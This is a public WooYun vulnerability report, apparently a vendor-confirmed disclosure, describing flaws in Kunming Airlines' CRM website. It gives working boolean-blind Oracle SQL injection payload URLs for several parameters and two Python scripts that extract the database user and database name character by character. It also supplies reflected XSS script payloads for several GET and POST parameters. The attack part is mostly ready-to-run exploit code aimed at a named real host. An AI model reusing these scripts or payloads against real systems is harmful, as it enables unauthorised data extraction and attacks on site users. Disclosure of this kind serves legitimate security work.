当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0194976

漏洞标题:昆明航空多处Oracle盲注(附脚本)&反射型XSS打包

相关厂商:昆明航空

漏洞作者: V1ct0r

提交时间:2016-04-11 14:37

修复时间:2016-05-26 15:10

公开时间:2016-05-26 15:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-11: 细节已通知厂商并且等待厂商处理中
2016-04-11: 厂商已经确认,细节仅向厂商公开
2016-04-21: 细节向核心白帽子及相关领域专家公开
2016-05-01: 细节向普通白帽子公开
2016-05-11: 细节向实习白帽子公开
2016-05-26: 细节向公众公开

简要描述:

我曾经跨过山和大海
也穿过人山人海
我曾经拥有着的一切
转眼都飘散如烟
我曾经失落失望失掉所有方向
直到看见平凡才是唯一的答案

详细说明:

Site:http://crm.airkunming.com/
0x00 Blind SQL Injection(boolean-based blind)
SQLi_1_1(发生在里程累计查询处dstCity参数)
Payload:

http://crm.airkunming.com/cal/consumecal?dstCity=-1%27%20OR%203*2*1=6%20AND%20000477=000477%20or%20%27X2bE5JjB%27=%27&memberlevel=01&orgCity=CGO&seatclass=L


就以此注入点为例,用个Python脚本来获取数据.
1).首先读取下当前数据库用户名长度

length(SYS_CONTEXT('USERENV','CURRENT_USER'))=13


构造:

http://crm.airkunming.com/cal/consumecal?dstCity=-1' OR 3*2*1=6 AND 000477=000477 AND length(SYS_CONTEXT('USERENV','CURRENT_USER'))=n or 'X2bE5JjB'='&memberlevel=01&orgCity=CGO&seatclass=L


后面=n处我们从1开始尝试,发现当n=8时,返回为true.

sqli01.png


sqli02.png


从而确定了其数据库用户长度为8.
2).Python脚本

import httplib
import string
import urllib
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': '',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21',}
payloads = list(string.ascii_lowercase)
payloads += list(string.ascii_uppercase)
for i in range(0,10):
payloads.append(str(i))
print '***********************StarT Retrieving NoW***********************'
user = ''
for i in range(1,9,1):
for payload in payloads:
conn = httplib.HTTPConnection('crm.airkunming.com', timeout=300)
parameters = {
'dstCity': "-1' OR 3*2*1=6 AND 000477=000477 AND ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),%s,1))=%s or 'X2bE5JjB'='" % (i, ord(payload)),
'memberlevel': '01',
'orgCity': 'CGO',
'seatclass': 'L',
}
conn.request(method = 'POST',
url='/cal/consumecal',
headers = headers,
body = urllib.urlencode(parameters))
content = conn.getresponse().read()
conn.close()
print '*',
if '0' in content:
user += payload
print '\n[Retrieving]', user
break
print '\nCurrent Oracle user is', user


sqli03res.png


得到用户名为:FFPENTER
接下来还可以来看看数据库名:

http://crm.airkunming.com/cal/consumecal?dstCity=-1%27%20OR%203*2*1=6%20AND%20000477=000477%20AND%20length%28SYS_CONTEXT%28%27USERENV%27,%27db_name%27%29%29=5%20or%20%27X2bE5JjB%27=%27&memberlevel=01&orgCity=CGO&seatclass=L


构造发现数据库名长度为5.

sqli04.png


只需要对上面的脚本稍作改动即可

#encoding=gbk
import httplib
import string
import urllib
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': '',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21',}
payloads = list(string.ascii_lowercase)
payloads += list(string.ascii_uppercase)
for i in range(0,10):
payloads.append(str(i))
print '***********************StarT Retrieving NoW***********************'
dbname = ''
for i in range(1,6,1):
for payload in payloads:
conn = httplib.HTTPConnection('crm.airkunming.com', timeout=300)
parameters = {
'dstCity': "-1' OR 3*2*1=6 AND 000477=000477 AND ascii(substr(SYS_CONTEXT('USERENV','db_name'),%s,1))=%s or 'X2bE5JjB'='" % (i, ord(payload)),
'memberlevel': '01',
'orgCity': 'CGO',
'seatclass': 'L',
}
conn.request(method = 'POST',
url='/cal/consumecal',
headers = headers,
body = urllib.urlencode(parameters))
content = conn.getresponse().read()
conn.close()
print '*',
if '0' in content:
dbname += payload
print '\n[Retrieving]', dbname
break
print '\nOracle DB_name is', dbname


dbname.png


继续利用上面的方法我们还可以获取到HOST\IP信息等(可参考:http://www.myhack58.com/Article/html/3/7/2011/29138.htm):

host.png


SQLi_1_2(发生在里程查询处orgCity参数) Payload:

http://crm.airkunming.com/cal/consumecal?dstCity=CGO&memberlevel=01&orgCity=-1%27%20OR%203*2*1=6%20AND%20000125=000125%20or%20%27Ad42Wpqc%27=%27&seatclass=L

sqli03.png

Payload:

http://crm.airkunming.com/cal/consumecal?dstCity=CGO&memberlevel=01&orgCity=-1%27%20OR%203*2*1=6%20AND%20000125=000126%20or%20%27Ad42Wpqc%27=%27&seatclass=L

sqli04.png

SQLi_2_1(发生在里程兑换查询处dstCity参数) Payload:

http://crm.airkunming.com/cal/convertPoint?converttype=02&dstCity=-1%27%20OR%203*2*1%3d6%20AND%20000762%3d000762%20or%20%279SMhIilt%27%3d%27&orgCity=CGO&seatclass=O&upclass=O

sqli05.png

Payload:

http://crm.airkunming.com/cal/convertPoint?converttype=02&dstCity=-1%27%20OR%203*2*1=6%20AND%20000762=000763%20or%20%279SMhIilt%27=%27&orgCity=CGO&seatclass=O&upclass=O

sqli06.png

SQLi_2_2(发生在里程兑换查询处orgCity参数) Payload:

http://crm.airkunming.com/cal/convertPoint?converttype=02&dstCity=CGO&orgCity=-1%27%20OR%203*2*1%3d6%20AND%20000111%3d000111%20or%20%27g1nxDILy%27%3d%27&seatclass=O&upclass=O

sqli07.png

Payload:

http://crm.airkunming.com/cal/convertPoint?converttype=02&dstCity=CGO&orgCity=-1%27%20OR%203*2*1=6%20AND%20000111=000112%20or%20%27g1nxDILy%27=%27&seatclass=O&upclass=O

sqli08.png


0x01 反射型XSS XSS1(Cardtype) Payload:

http://crm.airkunming.com/comm/vip?cardtype=11%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28/V1ct0r/%29%3C/ScRiPt%3E

xss1.png

XSS2(OrderNo) Payload:

http://crm.airkunming.com/pay/payCompleteLoading?orderNo=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/V1ct0r/)%3C/ScRiPt%3E

xss2.png

XSS3(dstCity) http://crm.airkunming.com/convert/loading Post Data:

dstCity=SZX%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/V1ct0r/)%3C/ScRiPt%3E&dstCityLabel=%e4%b8%ad%e6%96%87/%e6%8b%bc%e9%9f%b3&flightDates=&flightType=DC&orgCity=&orgCityLabel=%e4%b8%ad%e6%96%87/%e6%8b%bc%e9%9f%b3

xss3.png

同样的问题还发生在:http://crm.airkunming.com/convert/loading POST参数的flightDates/flightType/orgCity中,不再一一证明了。

漏洞证明:

如上

修复方案:

过滤

版权声明:转载请注明来源 V1ct0r@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2016-04-11 15:01

厂商回复:

感谢对昆航的关注,我们会尽快安排处理

最新状态:

暂无


漏洞评价:

评价

  1. 2016-04-11 15:27 | 牛肉包子 ( 普通白帽子 | Rank:307 漏洞数:70 | baozisec)

    好屌啊

  2. 2016-04-11 15:46 | V1ct0r ( 普通白帽子 | Rank:361 漏洞数:76 | 生活不止眼前的苟且,还有黑客和远方.)

    @牛肉包子 大表哥带我飞>﹏<